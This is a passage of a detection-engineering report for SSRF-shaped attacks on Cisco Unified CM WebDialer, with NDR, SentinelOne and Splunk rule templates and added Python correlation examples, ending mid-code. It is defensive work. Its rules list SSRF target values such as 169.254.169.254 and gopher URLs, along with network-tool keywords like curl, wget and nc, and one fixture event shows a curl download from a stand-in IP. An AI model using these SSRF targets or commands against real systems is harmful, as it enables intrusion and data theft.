Do not require request-body logging for production deployment. Request-body or parameter capture may support investigation, but the deployable correlation should work from endpoint path, query string, source context, response behavior, backend identity, SSRF-shaped destination indicators, egress behavior, and management-plane correlation.

Translate the Detection Query Pattern into the target NDR, WAF, proxy, firewall, or SIEM language using local event categories, asset groups, allowlists, enrichment fields, and time-window logic.

Validate joins between virtual host, backend host, Cisco Unified CM node, Unified CM SME node, Cisco Unified CM cluster, management interface, source IP, forwarded source IP, NAT egress identity, voice-management segment, administrative audit records, service-state telemetry, file-integrity records, and route-plan change records before alert-mode deployment.

Run the rule in hunt mode first to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, cluster communication, and expected voice-platform egress.

Treat TLS termination, URI preservation, source-IP preservation, backend-host mapping, Cisco Unified CM cluster mapping, WebDialer enablement mapping, administrator-source mapping, approved integration baselining, allowlist tuning, false-positive testing, query-performance validation, SOC triage fields, and alert-routing ownership as required local deployment work.

DRI Assessment

High resilience where URI visibility, Cisco Unified CM asset inventory, WebDialer enablement inventory, virtual-host mapping, backend-host mapping, source-context enrichment, DNS/proxy telemetry, approved-source enrichment, rare-destination baselining, administrative audit visibility, service-state telemetry, file-integrity telemetry, and route-plan change visibility are available. Resilience is materially lower where WebDialer URI visibility, WebDialer enablement inventory, or Unified CM administrative telemetry is unavailable.

DRI

8.6 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer endpoint activity and high when WebDialer activity aligns with SSRF-shaped request context, abnormal response transitions, rare egress, appliance-side file modification, service restart activity, administrative changes, route-plan changes, voice-service instability, or management access from unfamiliar sources.

Operational TCR

8.2 / 10

Full-Telemetry TCR

9.2 / 10

Limitations

Encrypted traffic without WAF, reverse-proxy, load-balancer, application-layer, or server-side HTTP logging may hide WebDialer URI paths and request parameters. Request bodies may not be logged or may be intentionally excluded for privacy, performance, or operational reasons. Legitimate click-to-call workflows, voice-platform monitoring, provider-managed support, vulnerability scanning, patch validation, cluster maintenance, backup activity, or emergency remediation may touch WebDialer routes or produce related management-plane activity. Critical promotion requires local correlation to appliance file telemetry, administrative audit logs, service-state telemetry, route-plan changes, management access, shell activity, or confirmed appliance-side compromise evidence.

Detection Query Pattern

Vendor-neutral NDR query pattern for Cisco Unified CM WebDialer SSRF-shaped activity with rare egress or voice-control-plane follow-on change. This pattern requires target-platform syntax conversion, URI-preserving WebDialer telemetry validation, Cisco Unified CM / Unified CM SME asset validation, WebDialer enablement validation, forwarded-source normalization, downstream voice-management telemetry validation, administrator-context validation, timing-window tuning, and environment-specific allowlisting before production deployment.

NetworkEvent AS WebDialerUpstreamSuspiciousActivity
WHERE WebDialerUpstreamSuspiciousActivity.DestinationAsset IN ASSET_GROUP (
"Cisco Unified CM Appliances",
"Cisco Unified CM SME Appliances",
"Cisco Unified CM Clusters",
"Cisco Unified CM Nodes",
"Cisco Unified CM WebDialer Services",
"Cisco Unified CM Management Interfaces",
"Cisco Unified CM Reverse Proxy Backends",
"Cisco Unified CM Load Balancer Backends",
"Cisco Voice Control-Plane Systems"
)
AND WebDialerUpstreamSuspiciousActivity.ServiceState IN ANY (
"webdialer_enabled",
"webdialer_route_exposed",
"webdialer_endpoint_reachable",
"webdialer_service_confirmed"
)
AND (
WebDialerUpstreamSuspiciousActivity.RequestPathCategory IN ANY (
"webdialer_path",
"webdialer_servlet_path",
"webdialer_api_path",
"locally_confirmed_webdialer_endpoint",
"unexpected_webdialer_endpoint_variant",
"webdialer_request_normalization_mismatch"
)
OR WebDialerUpstreamSuspiciousActivity.EventPattern IN ANY (
"abnormal_webdialer_access",
"webdialer_request_from_unapproved_source",
"webdialer_access_outside_click_to_call_workflow",
"webdialer_backend_fetch_behavior",
"webdialer_response_anomaly",
"webdialer_failure_to_success_pattern",
"suspicious_source_to_voice_management_plane"
)
OR WebDialerUpstreamSuspiciousActivity.SourceContext IN ANY (
"unfamiliar_internet_source",
"hosting_provider_source",
"residential_proxy_source",
"suspicious_asn",
"unusual_geography",
"vpn_ingress_source",
"source_not_in_voice_admin_baseline",
"source_not_in_webdialer_workflow_baseline",
"source_not_in_provider_managed_baseline"
)
)
AND (
WebDialerUpstreamSuspiciousActivity.RequestParameterRisk IN ANY (
"loopback_reference",
"link_local_reference",
"private_address_reference",
"internal_hostname_reference",
"nested_url_parameter",
"unexpected_url_scheme",
"encoded_url_scheme",
"double_encoded_destination",
"backend_fetch_error",
"host_header_anomaly",
"abnormal_request_size_transition",
"abnormal_response_size_transition"
)
OR WebDialerUpstreamSuspiciousActivity.DecodedRequestContent IN ANY (
"127.0.0.1",
"localhost",
"0.0.0.0",
"169.254.169.254",
"private_rfc1918_address",
"internal_hostname",
"http_url_inside_parameter",
"https_url_inside_parameter",
"file_url_inside_parameter",
"gopher_url_inside_parameter",
"encoded_http_scheme",
"encoded_https_scheme",
"encoded_file_scheme",
"encoded_gopher_scheme"
)
OR EVENT_NEAR WITHIN ENV_CUCM_WEBDIALER_NETWORK_CORRELATION_WINDOW (
NetworkEvent AS RareUnifiedCMEgress
WHERE RareUnifiedCMEgress.SourceAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND RareUnifiedCMEgress.EventPattern IN ANY (
"rare_outbound_connection",
"new_destination_for_cucm_node",
"new_destination_for_voice_management_segment",
"unexpected_external_egress",
"unexpected_dns_resolution",
"connection_to_unapproved_destination",
"connection_to_unknown_reputation_destination",
"connection_to_suspicious_reputation_destination",
"connection_to_unapproved_country",
"egress_not_in_voice_platform_baseline"
)
AND RareUnifiedCMEgress.DestinationContext IN ANY (
"destination_not_in_cucm_baseline",
"destination_not_in_voice_management_baseline",
"destination_not_in_directory_services_baseline",
"destination_not_in_dns_ntp_backup_baseline",
"destination_not_in_provider_support_baseline",
"destination_not_in_monitoring_baseline",
"newly_seen_destination",
"low_reputation_destination",
"unapproved_external_destination"
)
)
OR EVENT_NEAR WITHIN ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW (
ManagementOrConfigurationEvent AS VoiceControlPlaneChange
WHERE VoiceControlPlaneChange.RelatedUnifiedCMAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND VoiceControlPlaneChange.EventPattern IN ANY (
"cucm_file_created",
"cucm_file_modified",
"cucm_service_restart",
"cucm_administrative_configuration_change",
"cucm_route_plan_change",
"cucm_call_routing_change",
"new_cucm_administrator_created",
"cucm_administrator_modified",
"management_login_from_new_source",
"unusual_cluster_communication",
"voice_service_instability",
"unexpected_shell_activity"
)
AND VoiceControlPlaneChange.ChangeRisk IN ANY (
"appliance_integrity_change",
"voice_control_plane_change",
"call_routing_trust_change",
"administrative_trust_change",
"management_access_expansion",
"service_availability_risk",
"cluster_trust_change",
"configuration_integrity_risk",
"post_exploitation_indicator"
)
)
)
AND OPTIONAL_CONFIDENCE_INCREASE WITHIN ENV_CUCM_ADMIN_CONTEXT_WINDOW (
ManagementOrSecurityEvent AS AdministratorRiskContext
WHERE AdministratorRiskContext.RelatedUnifiedCMAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND AdministratorRiskContext.EventPattern IN ANY (
"new_administrator_created",
"rare_administrator_used",
"administrator_from_unusual_source",
"administrator_activity_outside_change_window",
"administrator_not_in_baseline",
"api_or_service_account_activity",
"session_anomaly",
"provider_managed_access_outside_expected_window"
)
)
AND OPTIONAL_CONFIDENCE_INCREASE WITHIN ENV_CUCM_IMPACT_FOLLOWON_WINDOW (
NetworkOrSecurityEvent AS VoicePlatformImpactContext
WHERE VoicePlatformImpactContext.RelatedAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND VoicePlatformImpactContext.EventPattern IN ANY (
"unusual_outbound_communication",
"additional_management_interface_access",
"high_value_system_access",
"directory_service_access_anomaly",
"backup_export_activity",
"monitoring_disruption",
"logging_gap",
"defensive_visibility_reduction",
"voice_service_restart",
"registration_anomaly",
"route_plan_instability",
"call_routing_anomaly"
)
)
AND NOT ChangeContext IN ANY (
"approved_voice_platform_maintenance",
"approved_webdialer_workflow",
"approved_click_to_call_workflow",
"approved_call_management_integration",
"approved_monitoring_activity",
"approved_provider_support",
"approved_patch_validation",
"approved_vulnerability_scanning",
"approved_backup_activity",
"approved_directory_integration",
"approved_cluster_maintenance",
"approved_route_plan_change",
"approved_service_restart",
"approved_incident_response",
"approved_emergency_remediation"
)

SentinelOne

Detection Viability Assessment

Production-ready where SentinelOne covers Cisco Unified CM / Unified CM SME appliances, supported Linux hosts, management jump systems, reverse-proxy hosts, load-balancer support systems, monitoring systems, backup systems, or file-integrity collection points that can be reliably mapped to Cisco Unified CM nodes, clusters, management interfaces, and voice-management segments.

Direct endpoint-agent coverage on Cisco Unified CM appliances may vary by customer support model, Cisco supportability constraints, and appliance operating model. Where SentinelOne cannot be deployed directly on Unified CM appliances, this rule must be implemented as appliance-adjacent correlation using management-host telemetry, reverse-proxy telemetry, jump-host telemetry, monitoring-host telemetry, backup-host telemetry, file-integrity telemetry, service-state telemetry, and Cisco Unified CM administrative audit enrichment. Do not represent adjacent-host coverage as direct appliance endpoint coverage unless the customer confirms supported telemetry from the appliance itself.

Rule

Cisco Unified CM WebDialer Follow-On File Modification, Service Manipulation, or Management-Host Execution

Rule Format

SentinelOne Deep Visibility / STAR logic template requiring local SentinelOne tenant syntax validation, event-type validation, field-name validation, Cisco Unified CM endpoint or management-host validation, WebDialer telemetry correlation, file-path validation, approved-maintenance exceptions, timing-window tuning, and environment-specific allowlisting before STAR promotion.

Detection Purpose

Detect suspicious file, process, service, shell, transfer-tool, network, or management-host behavior associated with possible Cisco Unified CM / Unified CM SME compromise after suspicious WebDialer activity, especially where appliance-side file modification, service manipulation, route-plan change, unexpected shell activity, rare egress, or management access from unfamiliar hosts may indicate post-exploitation behavior.

Detection Logic

Trigger when a Cisco Unified CM appliance, Unified CM SME appliance, confirmed management host, reverse-proxy host, load-balancer support host, monitoring host, backup host, jump server, or file-integrity collection point records suspicious process, command-line, file, service, or network behavior tied to Cisco Unified CM service context, WebDialer context, voice-management context, route-plan context, or administrative workflows.

Assign medium severity when suspicious file, process, service, or network behavior occurs on a Cisco Unified CM appliance or mapped voice-management asset outside approved maintenance.

Assign high severity when suspicious file, process, service, or network behavior aligns with WebDialer-related web activity, root or privileged context, service restart activity, configuration file access, certificate or key-store access, route-plan manipulation, call-control configuration change, rare egress, or management access from an unfamiliar source.

Promote to critical when suspicious activity is correlated within the local control-plane correlation window with suspicious WebDialer activity, confirmed SSRF-shaped WebDialer context, appliance-side file write, root-level activity, command execution, unauthorized administrator creation, route-plan change, service restart, credential or configuration access, call-routing integrity impact, or voice-service disruption on the same Cisco Unified CM node, cluster, management host, or voice-management segment.

Required Telemetry

SentinelOne process telemetry where deployable.

SentinelOne command-line telemetry where deployable.

SentinelOne parent-process telemetry where deployable.

SentinelOne file telemetry where deployable.

SentinelOne network telemetry where deployable.

Cisco Unified CM appliance endpoint group where supported.

Cisco Unified CM SME appliance endpoint group where supported.

Cisco Unified CM management-host endpoint group.

Cisco Unified CM reverse-proxy or load-balancer endpoint group.

Cisco Unified CM jump-host endpoint group.

Cisco Unified CM monitoring-host endpoint group.

Cisco Unified CM backup-host endpoint group.

Cisco Unified CM file-integrity monitoring feed where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Approved voice administrator lookup.

Approved management-host lookup.

Approved provider-managed source lookup.

Approved maintenance-user lookup.

Approved service-management command lookup.

Approved backup job lookup.

Approved monitoring job lookup.

Approved patch-validation workflow lookup.

Approved incident-response workflow lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Engineering Implementation Instructions

Map EndpointName, EndpointId, AgentUuid, ParentProcessName, ProcessName, CommandLine, FilePath, EventType, EventPattern, DstIp, DstPort, DstDomain, EventTime, management_host_role, Cisco Unified CM cluster identifier, Cisco Unified CM node identifier, Cisco Unified CM role, appliance hostname, management IP, voice-management segment, service name, service action, route-plan object, call-routing change, and WebDialer correlation fields to the customer’s local SentinelOne and enrichment schema.

Create local asset groups for endpoint-visible Cisco Unified CM appliances, endpoint-visible Cisco Unified CM SME appliances, Cisco Unified CM management hosts, Cisco Unified CM reverse proxies, Cisco Unified CM load balancers, Cisco voice-management jump systems, Cisco voice-monitoring systems, Cisco backup systems, approved provider-managed systems, and confirmed file-integrity collection systems.

Validate whether SentinelOne is directly deployed on Cisco Unified CM / Unified CM SME appliances, only on adjacent management hosts, or only on proxy, jump, monitoring, backup, or file-integrity systems. Classify the final deployment as direct appliance endpoint detection, appliance-adjacent correlation, or management-plane support detection based on validated coverage.

Create exceptions for approved Cisco patching, backup jobs, certificate management, disaster recovery validation, service restarts, cluster maintenance, route-plan changes, provider-managed support, vulnerability validation, voice-monitoring jobs, call-routing changes, approved incident-response collection, and approved emergency remediation.

Do not suppress shell, Python, Perl, Bash, curl, wget, service, systemctl, file-read, or file-write behavior globally. Scope suppression to approved command patterns, approved users, approved management hosts, approved maintenance windows, approved provider workflows, and approved Cisco voice-platform operations.
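An added example of the scoping rule in the paragraph above (not part of the report and not SentinelOne STAR syntax): a suppression entry may only explain an event when the command pattern, user, host and maintenance window all match, shown beside the global command-string suppression the paragraph warns against. Hosts, users, the service name, the window and the constructed endpoint events are assumptions.

```python
"""Added example, not CyberDax's or SentinelOne's code: scoped suppression for
endpoint events versus global command-string suppression. All hosts, users,
windows, service names and events are constructed for illustration."""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

@dataclass(frozen=True)
class EndpointEvent:
    ts: datetime
    host: str
    user: str
    parent: str
    command: str

@dataclass(frozen=True)
class SuppressionRule:
    """All scope conditions must hold: command pattern, user, host and window."""
    workflow: str          # ChangeContext label the exception maps to
    command: re.Pattern
    users: frozenset
    hosts: frozenset
    windows: tuple         # ((start, end), ...) approved maintenance windows

    def matches(self, ev):
        return (self.command.search(ev.command) is not None
                and ev.user in self.users
                and ev.host in self.hosts
                and any(start <= ev.ts <= end for start, end in self.windows))

# The anti-pattern: suppress on command text alone, on every host, for every user.
GLOBAL_NOISE = ("systemctl", "service ", "curl ", "wget ", "tar ")

def global_suppress(ev):
    return any(token in ev.command for token in GLOBAL_NOISE)

def scoped_suppress(ev, rules):
    """Return the approved workflow that explains the event, or None."""
    for rule in rules:
        if rule.matches(ev):
            return rule.workflow
    return None

def _t(hhmm):
    h, m = hhmm.split(":")
    return datetime(2026, 6, 24, int(h), int(m), tzinfo=timezone.utc)

RULES = [
    SuppressionRule(
        workflow="approved_backup_activity",
        command=re.compile(r"^systemctl restart voice-backup\.service$"),
        users=frozenset({"svc_voiceops"}),
        hosts=frozenset({"cucm-jump01"}),
        windows=((_t("02:00"), _t("04:00")),),
    ),
]

# Constructed endpoint events (not real telemetry).
EVENTS = [
    EndpointEvent(_t("02:15"), "cucm-jump01", "svc_voiceops", "sshd",
                  "systemctl restart voice-backup.service"),      # approved job
    EndpointEvent(_t("14:37"), "cucm-mgmt01", "tomcat", "java",
                  "curl -s http://203.0.113.77/ -o /tmp/update.bin"),  # transfer tool under web context
    EndpointEvent(_t("02:20"), "cucm-jump01", "contractor7", "bash",
                  "systemctl restart voice-backup.service"),      # right command, wrong user
    EndpointEvent(_t("09:00"), "cucm-jump01", "svc_voiceops", "sshd",
                  "systemctl restart voice-backup.service"),      # right user, outside window
]

def evaluate(events=EVENTS, rules=RULES):
    """Per event: (host, explaining workflow or None, hidden by global suppression?)."""
    return [(ev.host, scoped_suppress(ev, rules), global_suppress(ev)) for ev in events]
```

Run against the constructed events, global suppression hides all four, including the transfer-tool execution under a web-service parent; the scoped rule explains only the one event where command, user, host and window agree, and leaves the other three for the analyst.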

Validate file telemetry for Cisco Unified CM configuration paths, service configuration files, certificate stores, key stores, temporary upload paths, web application paths, log directories, backup directories, export directories, route-plan exports, and locally defined file-integrity monitoring paths.

Validate network telemetry for rare egress from Unified CM appliances, management hosts, reverse-proxy hosts, monitoring hosts, backup hosts, or jump systems to destinations outside approved Cisco, provider, monitoring, call-control, backup, DNS, NTP, directory, certificate, and management destinations.

Join SentinelOne endpoint findings to WebDialer telemetry, Cisco Unified CM administrative audit logs, service-state telemetry, route-plan changes, file-integrity records, and voice-management asset inventory before promoting to high-confidence compromise detection.

Run in hunt mode before alert mode to baseline normal Cisco Unified CM service operations, certificate updates, backup jobs, monitoring checks, cluster communication, provider-managed support, patching, call-routing updates, vulnerability scanning, and emergency remediation.

Treat endpoint grouping, appliance-support validation, management-host role mapping, approved command exceptions, maintenance-window suppression, file-path validation, service-name validation, rare-egress baselining, false-positive testing, WebDialer correlation validation, and SOC alert routing as required local deployment work.

DRI Assessment

Moderate to high where SentinelOne covers Unified CM appliances or tightly mapped management hosts with process lineage, command-line, file, and network telemetry enabled. Resilience is lower where Cisco appliance internals are not directly monitored and coverage depends on reverse-proxy, jump-host, management-host, monitoring-host, backup-host, or file-integrity feeds.

DRI

8.1 / 10

TCR Assessment

Operational confidence is moderate for standalone appliance-adjacent process, file, service, or egress behavior and high when SentinelOne findings correlate with WebDialer URI activity, SSRF-shaped request context, administrative audit logs, file-integrity records, service-state changes, route-plan changes, or management logins from unfamiliar sources.

Operational TCR

7.9 / 10

Full-Telemetry TCR

9.0 / 10

Limitations

Direct endpoint telemetry may not be available on Cisco Unified CM or Unified CM SME appliances depending on supportability, operating model, and customer tooling. Legitimate Cisco patching, provider support, certificate management, backup operations, monitoring checks, disaster recovery validation, service restarts, route-plan changes, cluster maintenance, and emergency remediation may produce similar file, process, service, or egress behavior. This rule must be scoped to Cisco Unified CM appliances or confirmed management-plane assets and tuned against approved voice-platform workflows before alert-mode deployment.

Detection Query Pattern

SentinelOne Deep Visibility / STAR logic template for endpoint-visible Cisco Unified CM / Unified CM SME WebDialer follow-on file modification, service manipulation, suspicious process execution, and rare endpoint egress. This template requires SentinelOne tenant syntax validation, event-type validation, field-name validation, Cisco Unified CM endpoint or management-host validation, WebDialer telemetry correlation, file-path validation, timing-window tuning, and environment-specific allowlisting before STAR promotion.

EndpointEvent AS UnifiedCMWebDialerFollowOnHostActivity
WHERE UnifiedCMWebDialerFollowOnHostActivity.EndpointName IN ASSET_GROUP (
"Endpoint Visible Cisco Unified CM Appliances",
"Endpoint Visible Cisco Unified CM SME Appliances",
"Cisco Unified CM Management Hosts",
"Cisco Unified CM Reverse Proxy Hosts",
"Cisco Unified CM Load Balancer Support Hosts",
"Cisco Unified CM Jump Hosts",
"Cisco Unified CM Monitoring Hosts",
"Cisco Unified CM Backup Hosts",
"Cisco Unified CM File Integrity Collection Hosts",
"Cisco Voice Management Hosts"
)
AND (
UnifiedCMWebDialerFollowOnHostActivity.ParentProcessName IN ANY (
"webdialer",
"callmanager",
"tomcat",
"java",
"python",
"bash",
"sh",
"systemd",
"service-wrapper",
"cisco-service",
"voice-service",
"backup-service",
"monitoring-agent",
"provider-support-tool"
)
OR UnifiedCMWebDialerFollowOnHostActivity.EventPattern IN ANY (
"cucm_service_activity",
"webdialer_related_activity",
"callmanager_related_activity",
"tomcat_related_activity",
"voice_platform_service_activity",
"management_host_activity",
"provider_support_activity_outside_baseline"
)
)
AND UnifiedCMWebDialerFollowOnHostActivity.EventType IN ANY (
"File Creation",
"File Modification",
"File Permission Change",
"File Read",
"Archive Extraction",
"Process Creation",
"Process Network Connection",
"Service Modification",
"Service Restart",
"Scheduled Job Creation",
"Local User Modification",
"Credential Or Key Access",
"Configuration File Access"
)
AND (
UnifiedCMWebDialerFollowOnHostActivity.FilePath HAS_ANY (
"/tmp/",
"/var/tmp/",
"/dev/shm/",
"/usr/local/",
"/opt/",
"/var/log/",
"/backup/",
"/export/",
"/config/",
"/certificate/",
"/cert/",
"/key/",
"/keystore/",
"/truststore/",
"webdialer",
"callmanager",
"tomcat",
"route",
"dialplan"
)
OR UnifiedCMWebDialerFollowOnHostActivity.CommandLine HAS_ANY (
"webdialer",
"callmanager",
"tomcat",
"chmod ",
"chown ",
"curl ",
"wget ",
"nc ",
"ncat ",
"bash -c",
"/bin/sh -c",
"systemctl",
"service ",
"tar ",
"zip ",
"scp ",
"sftp ",
"whoami",
"uname",
"127.0.0.1",
"localhost",
"169.254.169.254"
)
OR UnifiedCMWebDialerFollowOnHostActivity.EventPattern IN ANY (
"unexpected_shell_execution",
"unexpected_interpreter_execution",
"unexpected_transfer_tool_execution",
"temporary_path_write",
"application_writable_path_write",
"configuration_file_access",
"certificate_or_key_access",
"route_plan_file_access",
"backup_export_activity",
"service_modification",
"service_restart",
"local_user_change",
"rare_process_network_connection",
"new_destination_for_voice_management_host"
)
)
AND OPTIONAL_CORRELATION WITHIN ENV_CUCM_WEBDIALER_CORRELATION_WINDOW (
ManagementOrNetworkEvent AS WebDialerManagementContext
WHERE WebDialerManagementContext.RelatedAsset IN SAME_VOICE_PLATFORM_SCOPE (
UnifiedCMWebDialerFollowOnHostActivity.EndpointName
)
AND WebDialerManagementContext.EventPattern IN ANY (
"abnormal_webdialer_access",
"webdialer_request_from_unapproved_source",
"webdialer_access_outside_click_to_call_workflow",
"webdialer_backend_fetch_behavior",
"ssrf_shaped_webdialer_request",
"webdialer_response_anomaly",
"webdialer_failure_to_success_pattern",
"suspicious_source_to_voice_management_plane"
)
)
AND OPTIONAL_CORRELATION WITHIN ENV_CUCM_HOST_FOLLOWON_WINDOW (
EndpointEvent AS UnifiedCMHostFollowOn
WHERE UnifiedCMHostFollowOn.EndpointName IN SAME_VOICE_PLATFORM_SCOPE (
UnifiedCMWebDialerFollowOnHostActivity.EndpointName
)
AND UnifiedCMHostFollowOn.EventPattern IN ANY (
"root_context_activity",
"privileged_execution",
"outbound_process_network_connection",
"rare_external_destination",
"administrator_state_change",
"service_state_change",
"route_plan_change",
"call_routing_change",
"backup_export_activity",
"configuration_change",
"voice_service_instability",
"downstream_voice_control_activity"
)
)
AND OPTIONAL_CORRELATION WITHIN ENV_CUCM_ADMIN_CONTEXT_WINDOW (
ManagementOrSecurityEvent AS UnifiedCMAdministratorContext
WHERE UnifiedCMAdministratorContext.RelatedAsset IN SAME_VOICE_PLATFORM_SCOPE (
UnifiedCMWebDialerFollowOnHostActivity.EndpointName
)
AND UnifiedCMAdministratorContext.EventPattern IN ANY (
"new_administrator_created",
"rare_administrator_used",
"administrator_from_unusual_source",
"administrator_activity_outside_change_window",
"administrator_not_in_baseline",
"api_or_service_account_activity",
"session_anomaly",
"provider_managed_access_outside_expected_window"
)
)
AND NOT ChangeContext IN ANY (
"approved_voice_platform_maintenance",
"approved_webdialer_workflow",
"approved_click_to_call_workflow",
"approved_call_management_integration",
"approved_monitoring_activity",
"approved_provider_support",
"approved_patch_validation",
"approved_vulnerability_scanning",
"approved_backup_activity",
"approved_certificate_management",
"approved_directory_integration",
"approved_cluster_maintenance",
"approved_route_plan_change",
"approved_service_restart",
"approved_incident_response",
"approved_emergency_remediation"
)

Splunk

Detection Viability Assessment

Production-ready as a Splunk summary-correlation rule where Cisco Unified CM / Unified CM SME WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement state, source reputation, approved-source context, rare egress context, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry can be normalized into scheduled candidate summaries.

This rule should not be deployed as a broad raw-index join across high-volume proxy, firewall, web, DNS, endpoint, and administrative telemetry. Production deployment should use scheduled candidate searches that populate summary indexes or accelerated datasets for suspicious WebDialer activity, rare Unified CM egress, and voice-control-plane change candidates. The final correlation search should operate on reduced candidate summaries and correlate them by Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management scope.
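The reduced-candidate correlation described above, which is also what the EVENT_NEAR WITHIN clauses of the NDR Detection Query Pattern earlier in this report express, carried out in Python as an added example (not the report's own query and not a Splunk or NDR vendor implementation): candidate summaries are grouped per Unified CM node, follow-on egress and control-plane changes are looked up by bisection inside the two local windows, rare egress is any destination outside the node's recently seen baseline and the approved-destination lookup, and severity follows the rule's tiers (medium alone, high with one corroborating path, critical when two or more converge). Asset names, destinations, window lengths and the candidate summaries are constructed.

```python
"""Added example, not CyberDax's code: time-window correlation of WebDialer
candidates with rare egress and control-plane changes over constructed
candidate summaries. Assets, destinations and windows are assumptions."""
from bisect import bisect_left, bisect_right
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

@dataclass(frozen=True)
class WebDialerCandidate:
    ts: datetime
    asset: str           # Unified CM node the request hit
    ssrf_shaped: bool    # RequestParameterRisk / DecodedRequestContent matched

@dataclass(frozen=True)
class EgressEvent:
    ts: datetime
    asset: str
    destination: str

@dataclass(frozen=True)
class ControlPlaneChange:
    ts: datetime
    asset: str
    pattern: str         # e.g. cucm_service_restart, cucm_route_plan_change

def index_by_asset(events):
    """Group events per asset, sorted by time, so windows can be bisected."""
    idx = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        idx[ev.asset].append(ev)
    return idx

def within_window(sorted_events, start, window):
    """Events with start <= ts <= start + window. Earlier events are ignored:
    the rule correlates follow-on activity, not activity preceding the candidate."""
    times = [ev.ts for ev in sorted_events]
    return sorted_events[bisect_left(times, start):bisect_right(times, start + window)]

def correlate(candidates, egress, changes, baseline, approved, egress_window, change_window):
    """Severity per the rule: medium alone, high for one corroborating path,
    critical when two or more high-confidence paths converge."""
    egress_idx, change_idx = index_by_asset(egress), index_by_asset(changes)
    findings = []
    for c in candidates:
        rare = [e.destination
                for e in within_window(egress_idx.get(c.asset, []), c.ts, egress_window)
                if e.destination not in baseline.get(c.asset, set())
                and e.destination not in approved]
        follow_on = [ch.pattern
                     for ch in within_window(change_idx.get(c.asset, []), c.ts, change_window)]
        paths = int(c.ssrf_shaped) + int(bool(rare)) + int(bool(follow_on))
        severity = "critical" if paths >= 2 else "high" if paths == 1 else "medium"
        findings.append({"asset": c.asset, "ts": c.ts.isoformat(), "ssrf_shaped": c.ssrf_shaped,
                         "rare_egress": rare, "follow_on": follow_on, "severity": severity})
    return findings

def _t(hhmm):
    h, m = hhmm.split(":")
    return datetime(2026, 6, 24, int(h), int(m), tzinfo=timezone.utc)

def run_example():
    """Constructed candidate summaries, baseline and lookups (not real data)."""
    baseline = {"cucm-pub": {"ntp.corp.example", "ldap.corp.example", "updates.vendor.example"}}
    approved = {"monitor.corp.example"}
    candidates = [
        WebDialerCandidate(_t("10:00"), "cucm-pub", False),
        WebDialerCandidate(_t("11:00"), "cucm-pub", True),
        WebDialerCandidate(_t("12:00"), "cucm-sub1", False),
        WebDialerCandidate(_t("13:00"), "cucm-sub1", False),
    ]
    egress = [
        EgressEvent(_t("10:03"), "cucm-pub", "ldap.corp.example"),   # in baseline
        EgressEvent(_t("11:02"), "cucm-pub", "203.0.113.77"),        # never seen
        EgressEvent(_t("12:04"), "cucm-sub1", "198.51.100.200"),     # never seen
        EgressEvent(_t("13:30"), "cucm-sub1", "198.51.100.201"),     # outside window
    ]
    changes = [
        ControlPlaneChange(_t("11:05"), "cucm-pub", "cucm_service_restart"),
        ControlPlaneChange(_t("12:59"), "cucm-sub1", "cucm_route_plan_change"),  # precedes 13:00
    ]
    return correlate(candidates, egress, changes, baseline, approved,
                     egress_window=timedelta(minutes=10), change_window=timedelta(minutes=30))
```

The per-asset index is the piece that keeps this cheap when translated to a scheduled search: each candidate touches only its own node's egress and change summaries, and the window bounds come from the two local correlation windows rather than from a raw-index join.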

Rule

Cisco Unified CM WebDialer SSRF Candidate Followed by Rare Egress or Voice-Control-Plane Change

Rule Format

Splunk SPL summary-correlation pattern requiring local index validation, sourcetype validation, macro validation, lookup validation, normalized field validation, summary-index validation, timing-window tuning, and environment-specific allowlisting before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM / Unified CM SME WebDialer activity that aligns with SSRF-shaped request behavior and is followed by rare outbound communication, administrative change, service manipulation, file activity, route-plan change, call-routing change, or voice-control-plane instability tied to the same Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management scope.

Detection Logic

Trigger when a scheduled WebDialer candidate summary identifies suspicious WebDialer access against a Cisco Unified CM or Unified CM SME asset with WebDialer enabled, especially when the request includes abnormal WebDialer paths, unapproved source context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response transitions, failure-to-success patterns, or source reputation risk.

Assign medium severity when suspicious WebDialer activity occurs against a Unified CM or Unified CM SME asset outside approved WebDialer workflows, monitoring, provider support, vulnerability scanning, patch validation, or maintenance.

Assign high severity when suspicious WebDialer activity is followed within the local rare-egress correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer activity is followed within the local control-plane correlation window by administrative configuration change, service restart, file creation, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, administrative identity, or voice-management scope.

Promote to critical when suspicious WebDialer activity converges with rare egress and control-plane change, or when correlated telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.
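The severity tiers above, as an added reference model (not code from the CyberDax report, Cisco, or Splunk) that applies the two correlation windows and the tier rules to constructed candidate records of the three summary types the platform rules consume. Window sizes, the record shape, and the sample timestamps are assumptions; the report leaves the windows as local ENV_* tuning values. It exists so the windowing and tiering can be unit-tested before they are translated into SPL or EQL.

```python
"""Reference model of the WebDialer follow-on correlation and severity tiers.

Added example, not code from the CyberDax report, Cisco, or Splunk. Window
sizes, record shapes and sample timestamps are assumptions.
"""
from dataclasses import dataclass
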